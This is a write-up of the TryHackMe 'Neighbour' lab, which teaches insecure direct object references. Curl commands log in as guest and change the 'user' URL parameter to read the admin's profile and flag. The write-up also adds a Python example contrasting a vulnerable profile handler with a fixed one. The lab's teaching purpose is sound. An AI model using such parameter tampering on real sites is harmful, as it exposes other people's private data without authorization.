Neighbour Writeup – Easy IDOR TryHackMe Room
In this writeup, we are going to solve step by step a TryHackMe room called “Neighbour”. It’s an IDOR-focused challenge on TryHackMe.
» Link to the room on TryHackMe
TryHackMe Neighbour Scenario
Here is the scenario from TryHackMe:
Check out our new cloud service, Authentication Anywhere — log in from anywhere you would like! Users can enter their username and password, for a totally secure login process! You definitely wouldn’t be able to find any secrets that other people have in their profile, right?
Our goal is the following:
Find the flag on your neighbor’s logged in page!
Let’s see!
Recon – Finding the IDOR
To make things a little bit harder, Firefox refused to work on the TryHackMe attack box, so we'll be doing everything with curl.
First, let’s see what the website on port 80 returns:
root@ip-10-82-135-87:~# curl -skLi 10.82.160.30
HTTP/1.1 200 OK
Date: Thu, 22 Jan 2026 10:55:49 GMT
Server: Apache/2.4.53 (Debian)
X-Powered-By: PHP/8.0.19
Set-Cookie: PHPSESSID=847d83810f43888794452ceae84c45e4; path=/
[...]
<form action="/index.php" method="post">
<div class="form-group">
<label>Username</label>
<input type="text" name="username" class="form-control " value="">
<span class="invalid-feedback"></span>
</div>
<div class="form-group">
<label>Password</label>
<input type="password" name="password" class="form-control ">
<span class="invalid-feedback"></span>
</div>
<div class="form-group">
<input type="submit" class="btn btn-primary" value="Login">
</div>
<p>Don't have an account? Use the guest account! (<code>Ctrl+U</code>)</p>
<!-- use guest:guest credentials until registration is fixed. "admin" user account is off limits!!!!! -->
</form>
[...]
curl options used:
- -s: silent mode
- -k: allows insecure connections
- -L: follows redirect
- -i: shows response headers
Great, it’s an Apache server running PHP. It has a login form and, according to the HTML comment, guest credentials can be used.
Let’s send the POST request with those credentials:
root@ip-10-82-135-87:~# curl -skLi -X POST -d "username=guest&password=guest" http://10.82.160.30/login.php -b "PHPSESSID=95fee1d0438578c4075c131e0da037ec"
HTTP/1.1 302 Found
Date: Thu, 22 Jan 2026 10:58:45 GMT
Server: Apache/2.4.53 (Debian)
X-Powered-By: PHP/8.0.19
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Location: profile.php?user=guest
[...]
Notice the Location header from the server: we are redirected to /profile.php?user=guest.
If profile.php displays the profile of whichever user is named in the “user” parameter, we might be able to display other profiles simply by providing their usernames in the URL.
Exploiting IDOR – Showing admin’s profile
This is exactly what we’re going to do: using our session cookie returned previously in the Set-Cookie header, we are going to try to access the admin profile:
root@ip-10-82-135-87:~# curl -skLi http://10.82.160.30/profile.php?user=admin -b "PHPSESSID=95fee1d0438578c4075c131e0da037ec"
HTTP/1.1 200 OK
Date: Thu, 22 Jan 2026 11:00:09 GMT
Server: Apache/2.4.53 (Debian)
X-Powered-By: PHP/8.0.19
[...]
<h1 class="my-5">Hi, <b>admin</b>. Welcome to your site. The flag is: flag{66be***************************}</h1>
[...]
Well, it was easier than expected!
We indeed have access to the admin’s profile and the flag is in the description.
Zoom on IDOR
But what is IDOR actually?
IDOR means “Insecure Direct Object Reference”, which on its own doesn’t tell you much.
Let’s see in this TryHackMe example: the “user” parameter was the vector for IDOR.
The profile page was using this parameter to decide which information to display.
It was insecure because no authorization check was performed (anyone with a session could see admin’s profile).
This user parameter was the direct reference to the object (the profile) we wanted to display.
Overall, we were able to access someone else’s information by manipulating the reference that the program uses to look up the object.
IDOR is a very well known vulnerability that can happen pretty much anywhere, often in the form of IDs:
- In URLs
- In APIs
- In HTTP Headers
- In HTTP Cookies
- In form data
- etc.
Here, it was directly inside the URL.
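To make the “no checks were performed” point concrete, here is an added example (not the room’s actual PHP source) that models profile.php in Python: the vulnerable handler trusts the “user” parameter alone, while the hardened one takes the identity from the server-side session and only honours a client-supplied “user” when the session is authorised for it. The session table, profiles and flag value are constructed for illustration.

```python
# Added example: minimal model of a profile endpoint with and without an
# object-level authorization check. All data below is constructed.
from dataclasses import dataclass

# Constructed server-side session table and user profiles.
SESSIONS = {
    "95fee1d0438578c4075c131e0da037ec": {"user": "guest", "role": "user"},
    "constructed-admin-session": {"user": "admin", "role": "admin"},
}
PROFILES = {
    "guest": "Hi, guest. Welcome to your site.",
    "admin": "Hi, admin. Welcome to your site. The flag is: flag{constructed}",
}


@dataclass
class Response:
    status: int
    body: str


def profile_vulnerable(cookie: str, params: dict) -> Response:
    """Mirrors the room: any logged-in session can read any profile,
    because the 'user' query parameter alone selects the object."""
    if cookie not in SESSIONS:
        return Response(302, "Location: index.php")
    target = params.get("user")
    if target not in PROFILES:
        return Response(404, "No such user")
    return Response(200, PROFILES[target])  # ownership is never checked


def profile_fixed(cookie: str, params: dict) -> Response:
    """Hardened: identity comes from the session, not from the client.
    A 'user' parameter is only honoured for the owner or an admin role."""
    session = SESSIONS.get(cookie)
    if session is None:
        return Response(302, "Location: index.php")
    # Default to the caller's own profile when no parameter is given.
    target = params.get("user", session["user"])
    # Object-level authorization check that the vulnerable version lacks.
    # It runs before the existence check so that a non-admin cannot use
    # 403-vs-404 differences to enumerate valid usernames.
    if target != session["user"] and session["role"] != "admin":
        return Response(403, "Forbidden")
    if target not in PROFILES:
        return Response(404, "No such user")
    return Response(200, PROFILES[target])
```

The guest session that reaches admin’s profile in the vulnerable handler gets a 403 from the hardened one, while its own profile and an admin session viewing guest still work.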
Final Thoughts – “Neighbour”, a good intro to IDOR
Overall, this TryHackMe room was very straightforward and focused on the IDOR.
One could exploit it without even knowing about IDOR, just by changing the user parameter on intuition or to see what happens.
It’s a great thing that TryHackMe links resources towards their OSINT teachings so beginners can learn more after having a practical exploitation in the room.
Overall, cool challenge! Hope you learned something.
Disclaimer
This article is provided for educational purposes only.
All techniques demonstrated were performed in a controlled lab environment.
Do not attempt to reproduce these actions on systems you do not own or have explicit authorization to test.
I do not encourage or take responsibility for any illegal use of the information provided.